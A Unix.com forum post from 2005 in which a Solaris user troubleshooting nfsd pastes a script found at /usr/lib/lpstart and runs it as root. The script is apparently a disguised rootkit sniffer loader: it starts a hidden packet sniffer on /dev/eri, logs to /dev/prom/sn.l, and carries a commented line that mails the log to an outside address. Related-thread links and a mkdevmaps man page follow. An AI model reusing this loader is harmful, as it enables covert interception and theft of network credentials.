Sponsored Content
Full Discussion: nfsd won't start at boot up
Operating Systems Solaris nfsd won't start at boot up Post 66375 by dcshungu on Sunday 13th of March 2005 08:27:31 PM
Old 03-13-2005
Hmmmm... lpstart... Let's see. We do have one in /usr/lib. It is a script and here is what it contains:

-----------------------------------------------------------------------

#!/bin/sh

set EMAIL_ADDRESS optix@dr-dre.com

#cp $SNFBIN /usr/lib/lpset
#cp sniffload /usr/lib/lpstart
touch /dev/prom/sn.l

#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null

echo "Restart on `date`" >>/dev/prom/sn.l

if test -f /dev/prom/dos ;then
cd /usr/lib
./lpq
fi

#nohup /usr/lib/lpset -s -o /dev/prom/sn.l >/dev/null &
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null
&

--------------------------------------------------------------------

I am going to run it and see what happens. Running it as root....

# lpstart
Sending output to nohup.out
^C#

Just had to do a 'ctrl C' as the script wouldn't return... That may be what's happening.

Now what exactly does 'lpstart' do. Is it native to Solaris or has it been installed by package that I installed? Those with a lot more sysadmin experience than me might be able to figure it out. Where is it being started from?

It seems that the puzzle's days are now numbered. Thanks!

10 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

HP 10.20 Won start

After I log ino the machine, a window pops up indicating that I should check that the HOSTNAME is the same in these three files /etc//rc.configd/netconf /etc/hosts /var/adm/inetd.sec How do I change the hostname in these files? Thanks, Mike h (1 Reply)
Discussion started by: hutchin
1 Replies

2. Solaris

cannot find boot device and won't boot off cdrom

I'm running solaris 2.5.1. My main development server is DEAD, i can't even boot off the cdrom, it powers up, acts like it is starting the boot process but then says cannot find boot device. I've done the search here on this site and saw the other posts, but at the ok prompt it won't even let me... (3 Replies)
Discussion started by: kymberm
3 Replies

3. SuSE

vsftpd won't start on SLES 10

I recently installed SLES 10 on an x86 64bit blade server. I then installed vsftpd from the suse cds through network services; however after configuring the vsftpd.conf file, the server fails to start: # /etc/init.d/vsftpd start Starting vsftpd startproc: exit status of parent of... (5 Replies)
Discussion started by: dave521
5 Replies

4. Red Hat

X Server won't start (Redhat 9) HELP

im running rh 9 on my vmware, i tryed changing the graphics card mode to resize the desktop, after restarting i get a message X Server cannot start. then it takes me to the consol screen to log on, "im new to using linux as of last night" It would be helpfull if anyone can help me resolve... (4 Replies)
Discussion started by: aoteg
4 Replies

5. Solaris

production server won't start please help me!

if anyone can help me here I will be in debt eternaly. I'm in a spot here fearing for my job. I tried to install a new scsi array on our E5500. I powered it down correctly, removed the terminator, connected the array and powered it on. It was taking so long to come up I freaked out and powered... (3 Replies)
Discussion started by: NewSolarisAdmin
3 Replies

6. UNIX for Dummies Questions & Answers

ToolTalk won't start

on my AIX 6.1 CDE's ToolTalk server won't start. It says: dtsession: Unable to exec /usr/dt/install/oldrules/dtrmrules.driver. A file or directory in the path name does not exist. How can I fix this? (0 Replies)
Discussion started by: rein
0 Replies

7. AIX

won't mount /usr...won't boot fully

Hello: NOOB here. I attempted to use smit mkcd. Failed on first attempt, not enough space. 2nd attempt tried to place iso on /usr, not enough space there. Cleanup ran for about 5 minutes after aborting. Now AIX won't boot. LCD display on 7029-6E3 says: 0517 MOUNT /USR. Attempted to boot from CD... (11 Replies)
Discussion started by: bbird
11 Replies

8. UNIX for Dummies Questions & Answers

don't have nfsd mount point in /proc/fs/nfsd

hi guys I installed NFS server and everything started out fine but I don't have /proc/fs/nfsd entry and so I can't mount nfsd. Therefore I can't start my nfs service. Why don't I have /proc/fs/nfsd? How do I create that? Thanks (1 Reply)
Discussion started by: alirezan
1 Replies

9. Red Hat

vftpd won't start..

Hi, I am using redhat enterprise 5.7 have installed vsftpd successfully but every time I try to start the service it comes up with FAILED. Here is the contents of the vsftpd.conf file: # Allow anonymous FTP? (Beware - allowed by default if you comment this out). anonymous_enable=YES # #... (3 Replies)
Discussion started by: titley100
3 Replies

10. Fedora

Um, my computer suddenly won't start up

Okay, I'm fairly green at Fedora, but it has worked like a gem until now. On startup I get a screen that says this: Booting 'Fedora (3.6.11-4.fc16.x86_64)' Loading Fedora (3.611-4.fc16.x86_64) Loading initial ramdisk .... _Fedora-16-x86_6: Unexpected inconsistency; run fsck manually. ... (6 Replies)
Discussion started by: Anchorsteamer
6 Replies
mkdevmaps(1M)						  System Administration Commands					     mkdevmaps(1M)

NAME
mkdevmaps - make device_maps entries SYNOPSIS
/usr/sbin/mkdevmaps DESCRIPTION
The mkdevmaps command writes to standard out a set of device_maps(4) entries describing the system's frame buffer, audio, and removable media devices. The mkdevmaps command is used by the init.d(4) scripts to create or update the /etc/security/device_maps file. Entries are generated based on the device special files found in /dev. For the different categories of devices, the mkdevmaps command checks for the following files under /dev: audio /dev/audio, /dev/audioctl, /dev/sound/... tape /dev/rst*, /dev/nrst*, /dev/rmt/... floppy /dev/diskette, /dev/fd*, /dev/rdiskette, /dev/rfd* removable disk /dev/dsk/c0t?d0s?, /dev/rdsk/c0t?d0s? frame buffer /dev/fb ATTRIBUTES
See attributes(5) for descriptions of the following attributes: +-----------------------------+-----------------------------+ | ATTRIBUTE TYPE | ATTRIBUTE VALUE | +-----------------------------+-----------------------------+ |Availability |SUNWcsu | +-----------------------------+-----------------------------+ |Interface Stability |Obsolete | +-----------------------------+-----------------------------+ SEE ALSO
allocate(1), bsmconv(1M), attributes(5) NOTES
mkdevmaps might not be supported in a future release of the Solaris operating system. SunOS 5.10 8 Oct 2003 mkdevmaps(1M)